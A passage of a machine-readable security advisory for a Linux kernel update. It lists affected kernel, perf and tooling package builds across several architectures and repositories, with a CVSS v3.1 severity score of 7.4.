"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
